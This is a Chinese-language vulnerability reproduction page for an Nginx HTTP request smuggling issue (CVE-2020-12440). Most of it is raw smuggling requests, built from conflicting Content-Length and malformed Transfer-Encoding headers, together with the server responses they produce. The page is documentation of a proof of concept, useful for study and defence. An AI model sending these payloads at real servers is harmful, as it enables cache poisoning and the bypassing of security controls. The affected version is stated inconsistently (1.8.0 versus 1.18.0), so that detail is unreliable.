# （CVE-2020-12440）Nginx <= 1.8.0 请求走私 ### 一、漏洞简介 Nginx 1.18.0及之前版本中存在安全漏洞。攻击者可利用该漏洞进行缓存投毒，劫持凭证或绕过安全保护。 ### 二、漏洞影响 Nginx <= 1.8.0 ### 三、复现过程 ![](/static/lingzu/images/2020_05-22/15904605983862.jpg) #### Request ```bash GET /test.html HTTP/1.1 Host: www.baud.com Content-Length: 2 GET /poc.html HTTP/1.1 Host: www.baidu.com Content-Length: 15 ``` #### Response ```bash HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 01 May 2020 18:28:44 GMT Content-Type: text/html Content-Length: 33 Last-Modified: Thu, 30 Apr 2020 14:36:32 GMT Connection: keep-alive ETag: "5eaae270-21" Accept-Ranges: bytes

Test Page!

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 15
Last-Modified: Thu, 30 Apr 2020 14:35:41 GMT
Connection: keep-alive
ETag: “5eaae23d-f”
Accept-Ranges: bytes

NGINX PoC File
“`

#### 其他例子

Request（200 OK + 405 Method Not Allowed）

“`bash
GET / HTTP/1.1
Host: www.baidu.com
Content-Length: 4
Transfer-Encoding : chunked

46
TRACE / HTTP/1.1
Host:www.baidu.com
Content-Length:15

kk
0s
“`

Response（200 OK + 405 Method Not Allowed）

“`html
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: “5e9f1a9b-264”
Accept-Ranges: bytes

Welcome to nginx!

If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.

For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.

Thank you for using nginx.

HTTP/1.1 405 Not Allowed
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 157
Connection: close

405 Not Allowed

nginx/1.18.0

“`

Request（200 OK + 404 Not Found）

“`bash
GET / HTTP/1.1
Host: www.baidu.com
Content-Length: 4
Transfer-Encoding : chunked

46
GET /404 HTTP/1.1
Host:www.baidu.com
Content-Length:15

kk
0s
“`

Response（200 OK + 404 Not Found）

“`html
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: “5e9f1a9b-264”
Accept-Ranges: bytes

Welcome to nginx!

If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.

For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.

Thank you for using nginx.

HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive

404 Not Found

nginx/1.18.0

“`

文章版权归作者所有，未经允许请勿转载。

THE END